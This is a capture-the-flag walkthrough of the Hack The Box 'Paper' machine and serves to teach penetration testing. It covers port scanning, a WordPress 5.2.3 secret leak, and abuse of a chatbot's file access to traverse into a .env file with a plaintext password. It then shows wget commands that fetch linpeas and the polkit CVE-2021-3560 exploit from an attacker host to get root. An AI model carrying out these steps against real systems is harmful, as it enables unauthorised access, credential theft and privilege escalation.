Paper is a Linux machine and is considered an easy box the hack the box. On this box, we will begin with a basic port scan and move laterally. Then we will enumerate domain name and exploit a secrets leaking vulnerability found in the WordPress plugin which will lead us towards secret chat domain. Then we will create a new user account and enumerate all the conversations and take advantage of the bot feature to read the sensitive file which will give us initial foothold to the target machine. Then we will be tasked to gain root access where we will exploit it using policy kit vulnerability found in year 2021 by Kevin Backhouse. Successful execution of the exploit will spawn a root shell.
Initial Access
Privilege Escalation
Let’s exploit it step by step.
We are going to start the assessment with the normal TCP/IP port scanning.
Let’s start with the port scan. We are using nmap to find out which ports are open and what services are running in the target host. Nmap is a popular port scanning tool come with Kali Linux. In order to perform port scan, we have used –sV flag which performs a service version scan against the target machine.
Flags features:
-sV: Attempts to determine the service version
nmap -sV 10.129.74.162
From the nmap scan, we have found there were only three ports open, which is port 22,80 and port 443. As usual HTTP service is running on port 80, HTTPS service is running on port 443 and the SSH service is running on port 22. Both HTTP and HTTPS service is used for the webhosting and the SSH service is used for remote connection. SSH version is the latest, and we did not find any vulnerabilities on SSH version 8.0 and the possible attack we can perform against the SSH service at this stage is bruteforce only which we might not need to do. Instead of thinking about the SSH bruteforce let’s start enumerating port 80 and 443.
Initial Enumeration
We begin enumeration by accessing port 80 and 443 over browser. Webpage does not have many interesting things. From the web page, we found it is showing default page of CentOS.
htttp://10.129.74.162
Find Domain Name
curl -I 10.129.74.162
Flags features:
-I: Include protocol response headers in the output
Further enumeration of the output result, we see X-backend-server revealed its domain name which is office.paper We have used Kali inbuilt tool called curl.
https://everything.curl.dev/project
After finding the domain name we are adding it to /etc/hosts file in the attacking machine. To add to host’s file you can use any text editor such as leafpad, gedit, nano or vim.
Why do we need to add domain in the local hosts file?
The /etc/hosts file contains a mapping of IP addresses to URLs. Your browser uses entries in the /etc/hosts file to override the IP-address-to-URL mapping returned by a DNS server. This is useful for testing DNS (domain name system) changes and the SSL configuration before making a website live.
Web Page Enumeration
Once we add domain name in the /etc/hosts file, we continued our enumeration process and checked HTTP and HTTPS services. From the HTTP service, we got a different page this time. The pages include a company name which is Blunder Tiffin Paper Company. Also, we can see someone has left a comment there that everyone has removed from the blog and there is only one user present now. Also, we noted a name (Jan) which can be a potential username and can be useful in our further assessment.
Then we checked the technologies used in the web page and found it is hosted in WordPress. WordPress is popular for having various vulnerabilities in it. From the wappalyzer result, we found that WordPress 5.2.3 is used. We have used a browser-add on called wappalyzer to find out the technology stacks.
Searching For the Exploit
As we have WordPress version, we searched for the exploit using Kali pre-installed tool called searchsploit. We found two exploits were there and based on our scenario we decided to go with the second one which has given a description that an unauthenticated user can retrieve secrets. Searchsploit is a command line tool with similar results as we get from the exploit database. Here are the commands to reproduce the Prove of concept (POC). Please note, -m flag is used to download the exploit.
searchsploit WordPress 5.2.3 searchsploit -m 47690 cat 47690.md
After reading the exploit we found that adding? static=1 can leak its secret contents which can be password or any other information that can be helpful for our further assessment.
As exploit mentioned that adding? static=1 in the URL will leak secrets, we tested by providing the below URL and found a subdomain URL
http://chat.office.papaer/register/8qozr226AhkCHZdyY
URL: http://office.paper/?static=1
Let’s add chat.office.paper to /etc/hosts file again.
After adding subdomain to the hosts file, we accessed it over the browser and found a rocket.chat CMS which is used for chatting. Being a penetration tester always two things come into mind what we have and what else we can do with that. So far, we do not have valid credentials to log in, we accessed the URL that we found after exploitation of the vulnerability earlier.
http://chat.office.papaer/register/8qozr226AhkCHZdyY
Accessing the below URL, we got a register page where we registered as a new user. We created a user named raj and given a fake email address and password to register an account.
Rocket Chat CMS Enumeration
We logged in as new user raj into the rocket.chat CMS and read all the conversations of other users from the general channel. There are 3 users and one bot user.
After reading their messages, we found that DwightKSchrute has assigned a bot named recyclops to help other users to answer common queries. Furthermore, he has also mentioned that a user can call bot by typing recyclops help in their chat windows and bot will be there to help them.
As we can see in the above picture when someone called bot for the help a default message come into the screen about the bot itself and instructions. If we have closer look into the messages, we can see there are some frequently asked questions. Furthermore, it has a feature to receive answers to our queries directly in our message box as well.
As we have logged in as raj user, which is a new account we created earlier, we are calling recyclops by typing help into the chat window. The same message and instructions came into our chat windows which confirms that recyclops is activated.
When we scroll down to check all the features and services provided by the recyclops. We notice that we can also list the files from some shared directories and get those files with the help of the bot.
From the above message of the bot, we got to know that it has a limited feature set to a particular folder. Recylops can only list and get files from the sales directory only we decided to list what sales directory contains by providing list command in the chat window.
From the output, we found that there is a user Dwight present there and a sale folder in the sales directory. Then we decided to enumerate further by going one step back from the sales directory and we got into Dwight home directory. There we saw a non-standard directory (hubot) present in the Dwight home directory.
Next, we checked the non-standard directory and listed all the files present in the hubot and notice there is .env file present there. Let’s talk about the environment files in the Linux system and why it is important to enumerate them.
What is env file?
.env files are used to store those variables and they should be written in all uppercase separated with underscores for naming convention. we access those variables through process.env after installing dotnev npm package.
Why it is important to check environment files?
These environment files may contain password in plain taxed format as well as in base64 format. If an attacker found any secrets from this file, then he/she can leverage a user account.
Now we know the importance of the environment files in a Linux distribution. Let’s check .env file to test the theory we have discussed above. We can view the file contests by providing directory path and the file name with file command.
file ../hubot/.env
As we can see a plain texted password from the .env file. We got the password but not the username so, from the penetration testing methodology we can check this password against all users that we have seen in the messages. We tested obtained password on SSH service against all users and got success on Dwight.
Username: dwight Password: Queenofblad3s!23
We successfully logged in via SSH as Dwight into the target machine. We can grab the user flag from the user home directory. Also, we need to escalate privilege, so we transferred linpeas script into the target /tmp directory. Please note, we need to setup the python server into our kali machine to transfer the script to the target machine. Also, we have given full permission to the linpeas script to execute it. For more information about Linux file permissions, feel free to visit the below link:
ssh [email protected] python3 -m http.server 80 wget 10.10.14.12/linpeas.sh chmod 777 linpeas.sh ./linpeas.sh
From the linpeas output, we saw few CVEs appear as red which means these CVEs could be potential exploits which may help us to escalate privilege to the root account. A privilege escalation attack is a cyberattack designed to gain unauthorized privileged access into a system. Attackers exploit human behaviours, design flaws or oversights in operating systems or web applications.
After searching those exploits, we found many of them require compiling, so we decided to go with CVE-2021-3560 as all these 3 exploits work similarly based on the target system dependencies. Then we found a nice article about the policy kit exploitation the in the Hacking articles which has very clear instructions to exploit it. The full article is available in the below link:
https://www.hackingarticles.in/linux-privilege-escalation-polkit-cve-2021-3560/
Background of the vulnerability can be found here:
https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
Reference of the exploit we have used here:
https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py
We simply downloaded the exploit from the github into our kali machine and transferred it to the target machine as we did earlier to transfer linpeas. We used wget command to download the exploit from GitHub, you may use other utilities as well such as curl.
wget https://raw.githubusercontent.com/Almorabea/Polkit-exploit/main/CVE-2021-3560.py
On the target side we downloaded the CVE-2021-3560.py exploit to the target /tmp directory with wget command. Then we execute the python script with python3.
wget 10.10.14.12/ CVE-2021-3560.py python3 CVE-2021-3560.py
After the successful execution of the script, it spawned a root shell. Now we can grab root flag from the root directory.
This machine was fun and was a great source of learning, where we learned and explored so many things such as TCP port scan, service enumeration, Information leakage vulnerability, chatbot feature abuse, file transfer, file permissions, the importance of environment file in the Linux and policy kit vulnerability to perform local privilege escalation.
Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!
Author: Subhash Paudel is a Penetration Tester and a CTF player who has a keen interest in various technologies and loves to explore more and more. Additionally, he is a technical writer at Hacking articles. Contact here: Linkedin